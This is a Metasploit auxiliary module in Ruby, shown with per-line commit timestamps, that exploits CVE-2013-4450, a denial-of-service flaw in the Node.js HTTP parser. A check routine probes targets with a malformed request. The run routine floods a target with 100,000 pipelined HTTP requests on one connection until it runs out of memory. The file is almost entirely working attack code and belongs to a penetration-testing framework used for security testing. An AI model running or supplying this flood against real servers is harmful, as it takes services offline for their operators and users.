2013-10-19 03:52:50 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2013-10-19 03:52:50 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Auxiliary
|
2013-10-19 03:52:50 +00:00
|
|
|
include Msf::Exploit::Remote::Tcp
|
|
|
|
include Msf::Auxiliary::Dos
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
2013-10-28 19:00:19 +00:00
|
|
|
'Name' => 'Node.js HTTP Pipelining Denial of Service',
|
2013-10-19 03:52:50 +00:00
|
|
|
'Description' => %q{
|
2013-10-28 19:00:19 +00:00
|
|
|
This module exploits a Denial of Service (DoS) condition in the HTTP parser of Node.js versions
|
2013-10-19 03:52:50 +00:00
|
|
|
released before 0.10.21 and 0.8.26. The attack sends many pipelined
|
|
|
|
HTTP requests on a single connection, which causes unbounded memory
|
|
|
|
allocation when the client does not read the responses.
|
|
|
|
},
|
2013-10-22 20:00:58 +00:00
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'Marek Majkowski', # Vulnerability discovery
|
|
|
|
'titanous', # Metasploit module
|
|
|
|
'joev' # Metasploit module
|
|
|
|
],
|
2013-10-19 03:52:50 +00:00
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'CVE', '2013-4450' ],
|
2016-07-15 17:00:31 +00:00
|
|
|
[ 'OSVDB', '98724' ],
|
2013-10-19 03:52:50 +00:00
|
|
|
[ 'BID' , '63229' ],
|
2013-10-22 20:00:58 +00:00
|
|
|
[ 'URL', 'http://blog.nodejs.org/2013/10/22/cve-2013-4450-http-server-pipeline-flood-dos' ]
|
2013-10-19 03:52:50 +00:00
|
|
|
],
|
|
|
|
'DisclosureDate' => 'Oct 18 2013'))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
Opt::RPORT(80),
|
|
|
|
OptInt.new('RLIMIT', [true, "Number of requests to send", 100000])
|
|
|
|
],
|
|
|
|
self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
def check
|
|
|
|
# http://blog.nodejs.org/2013/08/21/node-v0-10-17-stable/
|
|
|
|
# check if we are < 0.10.17 by seeing if a malformed HTTP request is accepted
|
2014-01-19 23:06:35 +00:00
|
|
|
status = Exploit::CheckCode::Safe
|
2013-10-19 03:52:50 +00:00
|
|
|
connect
|
|
|
|
sock.put(http_request("GEM"))
|
|
|
|
begin
|
|
|
|
response = sock.get_once
|
|
|
|
status = Exploit::CheckCode::Appears if response =~ /HTTP/
|
|
|
|
rescue EOFError
|
|
|
|
# checking against >= 0.10.17 raises EOFError because there is no
|
|
|
|
# response to GEM requests
|
2014-01-19 23:06:35 +00:00
|
|
|
vprint_error("Failed to determine the vulnerable state due to an EOFError (no response)")
|
|
|
|
return Msf::Exploit::CheckCode::Unknown
|
2013-10-19 03:52:50 +00:00
|
|
|
ensure
|
|
|
|
disconnect
|
|
|
|
end
|
|
|
|
status
|
|
|
|
end
|
|
|
|
|
|
|
|
def host
|
|
|
|
host = datastore['RHOST']
|
|
|
|
host += ":" + datastore['RPORT'].to_s if datastore['RPORT'] != 80
|
|
|
|
host
|
|
|
|
end
|
|
|
|
|
|
|
|
def http_request(method='GET')
|
|
|
|
"#{method} / HTTP/1.1\r\nHost: #{host}\r\n\r\n"
|
|
|
|
end
|
|
|
|
|
|
|
|
def run
|
|
|
|
payload = http_request
|
|
|
|
begin
|
2013-10-22 20:00:58 +00:00
|
|
|
print_status("Stressing the target memory...")
|
2013-10-19 03:52:50 +00:00
|
|
|
connect
|
|
|
|
datastore['RLIMIT'].times { sock.put(payload) }
|
2013-10-22 20:00:58 +00:00
|
|
|
print_status("Attack finished. If you read it, it wasn't enough to trigger an Out Of Memory condition.")
|
2013-10-19 03:52:50 +00:00
|
|
|
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
|
|
|
print_status("Unable to connect to #{host}.")
|
|
|
|
rescue ::Errno::ECONNRESET, ::Errno::EPIPE, ::Timeout::Error
|
2013-10-22 20:00:58 +00:00
|
|
|
print_good("DoS successful. #{host} not responding. Out Of Memory condition probably reached")
|
2013-10-19 03:52:50 +00:00
|
|
|
ensure
|
|
|
|
disconnect
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|